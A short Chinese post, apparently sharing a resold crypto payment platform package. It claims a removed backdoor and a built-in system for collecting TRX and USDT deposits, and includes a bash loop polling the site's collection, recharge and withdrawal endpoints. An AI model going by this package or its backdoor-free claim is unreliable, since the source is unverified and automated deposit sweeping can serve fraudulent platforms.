这套已经修复数据库并清理了后门 ,重写了教程,支持9国语言(后台控制) 查询余额,自带归集系统 脚本齐全 完美分享!
gmp 安装这个扩展 PHP 7.4
# 转账功能
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin
step=5 #间隔的秒数,不能大于10
for (( i = 0; i < 60; i=(i+step) )); do
curl https://tsk.hathimall.com/collect/trx
curl https://tsk.hathimall.com/collect/usdt
curl https://tsk.hathimall.com/collect/notifyRecharge
curl https://tsk.hathimall.com/collect/relieveAddress
curl https://tsk.hathimall.com/withdraw/balance
sleep $step
done
exit 0
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容